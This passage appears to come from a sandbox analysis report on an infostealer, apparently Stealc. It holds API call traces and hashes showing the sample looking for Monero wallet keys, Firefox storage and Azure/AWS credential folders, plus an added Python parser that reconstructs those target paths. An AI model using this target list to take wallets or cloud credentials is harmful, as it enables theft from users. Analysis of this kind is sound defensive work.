                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d556b085cf1b0fbb24323d38697598546949a4f6cea66ca4d07d76460a07f2b4
                            • Instruction ID: ab9dc88fb7715f5eb76770a25ab9cca537c85115882384d3a798b0c9cd277ff4
                            • Opcode Fuzzy Hash: d556b085cf1b0fbb24323d38697598546949a4f6cea66ca4d07d76460a07f2b4
                            • Instruction Fuzzy Hash: C751E8B7A0C201EFE7089D39DD9577BB6A9E784320F35453EA283C7640EE759800B6D2
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: addb896656df1cd3e25956083d6c61c582401b72623977d9bbdd27d4141b1743
                            • Instruction ID: 381294e23ff31e7c39b1d22c6e96db5aba8d5527dbbf442dcbac418ed37b0a17
                            • Opcode Fuzzy Hash: addb896656df1cd3e25956083d6c61c582401b72623977d9bbdd27d4141b1743
                            • Instruction Fuzzy Hash: DE418CF3A052105FE300593EEC94BA7B79BEBD4710F5B863ADA8497785EC35580682D1
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00B18636
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1866D
                            • lstrcpy.KERNEL32(?,00000000), ref: 00B186AA
                            • StrStrA.SHLWAPI(?,0187EA50), ref: 00B186CF
                            • lstrcpyn.KERNEL32(00D393D0,?,00000000), ref: 00B186EE
                            • lstrlen.KERNEL32(?), ref: 00B18701
                            • wsprintfA.USER32 ref: 00B18711
                            • lstrcpy.KERNEL32(?,?), ref: 00B18727
                            • StrStrA.SHLWAPI(?,0187EA68), ref: 00B18754
                            • lstrcpy.KERNEL32(?,00D393D0), ref: 00B187B4
                            • StrStrA.SHLWAPI(?,0187EF30), ref: 00B187E1
                            • lstrcpyn.KERNEL32(00D393D0,?,00000000), ref: 00B18800
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                            • String ID: %s%s
                            • API String ID: 2672039231-3252725368
                            • Opcode ID: 559ee86ac7d9317935b5deb7e4e377d4ff291d656565331553f93999b109d940
                            • Instruction ID: b6bc3c8804effe96d5851e2936de2f13c00ad1ca01c78924c0f0f96126ab73d4
                            • Opcode Fuzzy Hash: 559ee86ac7d9317935b5deb7e4e377d4ff291d656565331553f93999b109d940
                            • Instruction Fuzzy Hash: A8F17C72A01614AFCB10DB68DD58ADAB7B9EF88300F144599F90AE3350DF71AE45DBB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B01F9F
                            • lstrlen.KERNEL32(01878C38), ref: 00B01FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00B01FE3
                            • lstrlen.KERNEL32(00B31794), ref: 00B01FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0200E
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B02042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0204D
                            • lstrlen.KERNEL32(00B31794), ref: 00B02058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B02075
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B02081
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B020AC
                            • lstrlen.KERNEL32(?), ref: 00B020E4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B02104
                            • lstrcat.KERNEL32(00000000,?), ref: 00B02112
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B02139
                            • lstrlen.KERNEL32(00B31794), ref: 00B0214B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0216B
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B02177
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0219D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B021A8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B021D4
                            • lstrlen.KERNEL32(?), ref: 00B021EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0220A
                            • lstrcat.KERNEL32(00000000,?), ref: 00B02218
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B02242
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0227F
                            • lstrlen.KERNEL32(0187D280), ref: 00B0228D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B022B1
                            • lstrcat.KERNEL32(00000000,0187D280), ref: 00B022B9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B022F7
                            • lstrcat.KERNEL32(00000000), ref: 00B02304
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0232D
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B02356
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B02382
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B023BF
                            • DeleteFileA.KERNEL32(00000000), ref: 00B023F7
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00B02444
                            • FindClose.KERNEL32(00000000), ref: 00B02453
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                            • String ID:
                            • API String ID: 2857443207-0
                            • Opcode ID: 56ee649f31ce64acc45e812c857f5aa165ebb5cc7e814b01287d06c009a4c028
                            • Instruction ID: 832760e2b8718d212d673a1b819e6540d20cb7242235c0e78aade8827b12c3e3
                            • Opcode Fuzzy Hash: 56ee649f31ce64acc45e812c857f5aa165ebb5cc7e814b01287d06c009a4c028
                            • Instruction Fuzzy Hash: 0BE11E71A117169BCB21EF68DD8DA9EBBF9EF44300F0444A4F805E7291DB74DD498BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16445
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16480
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B164AA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B164E1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16506
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B1650E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16537
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: same associated dump set as listed for the function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FolderPathlstrcat
                            • String ID: \..\
                            • API String ID: 2938889746-4220915743
                            • Opcode ID: e8454c1817c5807e2671c9d81331f169cd773d1aff2f40ebee212e7d53938828
                            • Instruction ID: 4d8bff80b9f1e9da0a1ab66872ff14cc9191e13d4087a8a9b3fcfa93d513edf1
                            • Opcode Fuzzy Hash: e8454c1817c5807e2671c9d81331f169cd773d1aff2f40ebee212e7d53938828
                            • Instruction Fuzzy Hash: 0DF15D70A117169BCB21AF68D849AEEBBF5EF44300F4441B8F855D7291DB34DD8ACBA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B143A3
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B143D6
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B143FE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B14409
                            • lstrlen.KERNEL32(\storage\default\), ref: 00B14414
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14431
                            • lstrcat.KERNEL32(00000000,\storage\default\), ref: 00B1443D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14466
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B14471
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14498
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B144D7
                            • lstrcat.KERNEL32(00000000,?), ref: 00B144DF
                            • lstrlen.KERNEL32(00B31794), ref: 00B144EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14507
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B14513
                            • lstrlen.KERNEL32(.metadata-v2), ref: 00B1451E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1453B
                            • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00B14547
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1456E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B145A0
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00B145A7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B14601
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1462A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B14653
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1467B
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B146AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: same associated dump set as listed for the function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                            • String ID: .metadata-v2$\storage\default\
                            • API String ID: 1033685851-762053450
                            • Opcode ID: 887103a168f9dfe69169513a21cec78a8b5d1e3135091494735809ba937c613e
                            • Instruction ID: 58938a2fef4305bb77b8421d40887eb632692f529e4be8b6737f85af46d2c47d
                            • Opcode Fuzzy Hash: 887103a168f9dfe69169513a21cec78a8b5d1e3135091494735809ba937c613e
                            • Instruction Fuzzy Hash: 85B18B30A117069BCB21EF78DD89AAE7BE9EF50300F5400B4B846E7291DF74DD498BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B157D5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B15804
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B15835
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1585D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B15868
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B15890
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B158C8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B158D3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B158F8
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1592E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B15956
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B15961
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B15988
                            • lstrlen.KERNEL32(00B31794), ref: 00B1599A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B159B9
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B159C5
                            • lstrlen.KERNEL32(0187D178), ref: 00B159D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B159F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B15A02
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B15A2C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B15A58
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00B15A5F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B15AB7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B15B2D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B15B56
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B15B89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B15BB5
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B15BEF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B15C4C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B15C70
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: same associated dump set as listed for the function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2428362635-0
                            • Opcode ID: 4fae6368759de1cebde94f767c4e8528a842764e93c9f2a5fc62d8b26dbdac22
                            • Instruction ID: f1539cf14f876315a81fcbc1a7a2a46eb1bf853ed8b0a0a790afcdcfb3bfcfc3
                            • Opcode Fuzzy Hash: 4fae6368759de1cebde94f767c4e8528a842764e93c9f2a5fc62d8b26dbdac22
                            • Instruction Fuzzy Hash: AC027171A11B05DBCB21EF68D8899EEBBF5EF84300F5441A8F845E7290DB74DD898B90
                            APIs
                              • Part of subcall function 00B01120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B01135
                              • Part of subcall function 00B01120: RtlAllocateHeap.NTDLL(00000000), ref: 00B0113C
                              • Part of subcall function 00B01120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00B01159
                              • Part of subcall function 00B01120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00B01173
                              • Part of subcall function 00B01120: RegCloseKey.ADVAPI32(?), ref: 00B0117D
                            • lstrcat.KERNEL32(?,00000000), ref: 00B011C0
                            • lstrlen.KERNEL32(?), ref: 00B011CD
                            • lstrcat.KERNEL32(?,.keys), ref: 00B011E8
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0121F
                            • lstrlen.KERNEL32(01878C38), ref: 00B0122D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01251
                            • lstrcat.KERNEL32(00000000,01878C38), ref: 00B01259
                            • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00B01264
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01288
                            • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00B01294
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B012BA
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B012FF
                            • lstrlen.KERNEL32(0187D280), ref: 00B0130E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01335
                            • lstrcat.KERNEL32(00000000,?), ref: 00B0133D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01378
                            • lstrcat.KERNEL32(00000000), ref: 00B01385
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B013AC
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00B013D5
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01401
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0143D
                              • Part of subcall function 00B1EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00B1EE12
                            • DeleteFileA.KERNEL32(?), ref: 00B01471
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: same associated dump set as listed for the function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                            • String ID: .keys$\Monero\wallet.keys
                            • API String ID: 2881711868-3586502688
                            • Opcode ID: 5313b5c294aa0653ccb4c3b20130999905ada7c95cf160153c2edc8ad34ac1b6
                            • Instruction ID: 32a34c06f699e8dbb2c27ae63e411d7d8331ea7e03b29f9ab23538b1151ffece
                            • Opcode Fuzzy Hash: 5313b5c294aa0653ccb4c3b20130999905ada7c95cf160153c2edc8ad34ac1b6
                            • Instruction Fuzzy Hash: C8A13D71A11715ABCB25EF78DD89A9EBBF9EF44300F0444A4F905E7291DB34ED098BA0
                            APIs
                            • memset.MSVCRT ref: 00B1E740
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00B1E769
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E79F
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1E7AD
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00B1E7C6
                            • memset.MSVCRT ref: 00B1E805
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00B1E82D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E85F
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1E86D
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00B1E886
                            • memset.MSVCRT ref: 00B1E8C5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B1E8F1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E920
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1E92E
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00B1E947
                            • memset.MSVCRT ref: 00B1E986
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: same associated dump set as listed for the function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$memset$FolderPathlstrcpy
                            • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 4067350539-3645552435
                            • Opcode ID: bf673c6198e6ec7308e84337fac6602b0f6b2fe48f506cfa3e7c2f183c8db8a0
                            • Instruction ID: 674831daa9a859ccc16afac15be99b0fa27cb9d9f3c7278f8d28d2f2ca8179e9
                            • Opcode Fuzzy Hash: bf673c6198e6ec7308e84337fac6602b0f6b2fe48f506cfa3e7c2f183c8db8a0
                            • Instruction Fuzzy Hash: 4671D971A40218ABDB25EB64DC4AFED77B4EF48700F5404E4B619DB1D0DFB0AE888B64
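The function traced above resolves a base folder with SHGetFolderPathA and appends a literal subdirectory with lstrcat. The second argument to SHGetFolderPathA identifies the folder: 0x28 is CSIDL_PROFILE (the user profile), 0x1C is CSIDL_LOCAL_APPDATA, and 0x1A, used by the functions further up, is CSIDL_APPDATA. Read together with the literals, the targets here are %USERPROFILE%\.azure\, %USERPROFILE%\.aws\ and %LOCALAPPDATA%\.IdentityService\, and the Monero function above reads HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core\wallet_path before copying and deleting a file. The Python below is an added example for reading this report, not Joe Sandbox or Stealc code: it parses trace lines in the report's own format and reconstructs those locations, file operations and registry reads. The sample lines are copied from the two functions above (the Monero one excerpted); the rule that pairs a literal with the most recent SHGetFolderPathA root is an assumption about how the code builds its strings, so bases it cannot tie to a root are reported as <unresolved>.

```python
"""Parse Joe Sandbox 'APIs' trace lines ('• api.MODULE(args), ref: addr', the
format used throughout this report) and reconstruct the filesystem and
registry locations one function touches.  Added example for reading this
report, not Joe Sandbox or Stealc code.  CSIDL and hive values are documented
Windows constants; the root-pairing rule in reconstruct() is an assumption."""
import re

# SHGetFolderPathA nFolder values that occur in the traces above.
CSIDL = {
    0x1A: "%APPDATA%",       # CSIDL_APPDATA
    0x1C: "%LOCALAPPDATA%",  # CSIDL_LOCAL_APPDATA
    0x28: "%USERPROFILE%",   # CSIDL_PROFILE
}
HIVES = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
FILE_APIS = {"CopyFileA", "DeleteFileA", "GetFileAttributesA",
             "FindFirstFileA", "FindNextFileA", "FindClose"}

LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*"
    r"(?P<ref>[0-9A-Fa-f]+)\s*$")
POINTER_RE = re.compile(r"^[0-9A-Fa-f]{8}$")  # how the sandbox prints pointers


def parse_line(line):
    """Return (api, module, args, ref) for one trace line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = [] if m["args"] is None else [a.strip() for a in m["args"].split(",")]
    return m["api"], m["module"], args, int(m["ref"], 16)


def is_literal(arg):
    """Resolved strings are printed verbatim; pointers as 8 hex digits,
    unresolved values as '?'."""
    return arg not in ("", "?") and not POINTER_RE.match(arg)


def reconstruct(lines):
    """Walk one function's trace; return (paths, file_ops, registry).

    Assumption: a literal handed to lstrcat/lstrcpy/lstrlen extends the
    folder returned by the most recent SHGetFolderPathA; with no such root
    the base is reported as <unresolved>."""
    root, pending_key = None, None
    paths, file_ops, registry = [], [], []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        api, _module, args, _ref = parsed
        if api == "SHGetFolderPathA" and POINTER_RE.match(args[1]):
            folder = int(args[1], 16)  # nFolder is the second argument
            root = CSIDL.get(folder, f"CSIDL_0x{folder:X}")
        elif api in ("lstrcat", "lstrcpy", "lstrlen"):
            for a in args:
                if is_literal(a):
                    candidate = f"{root or '<unresolved>'}{a}"
                    if candidate not in paths:  # lstrlen/lstrcat repeat a literal
                        paths.append(candidate)
        elif api == "RegOpenKeyExA":
            hive = HIVES.get(int(args[0], 16), args[0])
            pending_key = f"{hive}\\{args[1]}"
        elif api == "RegQueryValueExA":
            registry.append((pending_key, args[1]))
        elif api in FILE_APIS:
            file_ops.append(api)
    return paths, file_ops, registry


# Trace lines copied from two functions above: the Azure/AWS credential
# directory routine, and an excerpt of the Monero wallet routine.
AZURE_TRACE = r"""
• memset.MSVCRT ref: 00B1E740
• SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00B1E769
• lstrcpy.KERNEL32(00000000,?), ref: 00B1E79F
• lstrcat.KERNEL32(?,00000000), ref: 00B1E7AD
• lstrcat.KERNEL32(?,\.azure\), ref: 00B1E7C6
• SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00B1E82D
• lstrcat.KERNEL32(?,\.aws\), ref: 00B1E886
• SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B1E8F1
• lstrcat.KERNEL32(?,\.IdentityService\), ref: 00B1E947
""".strip().splitlines()

MONERO_TRACE = r"""
  • Part of subcall function 00B01120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00B01159
  • Part of subcall function 00B01120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00B01173
  • Part of subcall function 00B01120: RegCloseKey.ADVAPI32(?), ref: 00B0117D
• lstrcat.KERNEL32(?,.keys), ref: 00B011E8
• lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00B01264
• lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00B01294
• CopyFileA.KERNEL32(?,?,00000001), ref: 00B013D5
• DeleteFileA.KERNEL32(?), ref: 00B01471
""".strip().splitlines()

if __name__ == "__main__":
    for name, trace in (("azure/aws", AZURE_TRACE), ("monero", MONERO_TRACE)):
        print(name, *reconstruct(trace))
```

Run it on any "APIs" block of this report pasted into a list of lines; pointer arguments (eight hex digits) and unresolved "?" values are ignored, so only the strings the sandbox managed to resolve contribute to the reconstructed paths.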
                            APIs
                            • lstrcpy.KERNEL32 ref: 00B1ABCF
                            • lstrlen.KERNEL32(0187E9C0), ref: 00B1ABE5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1AC0D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC18
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1AC41
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1AC84
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC8E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1ACB7
                            • lstrlen.KERNEL32(00B34AD4), ref: 00B1ACD1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1ACF3
                            • lstrcat.KERNEL32(00000000,00B34AD4), ref: 00B1ACFF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1AD28
                            • lstrlen.KERNEL32(00B34AD4), ref: 00B1AD3A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1AD5C
                            • lstrcat.KERNEL32(00000000,00B34AD4), ref: 00B1AD68
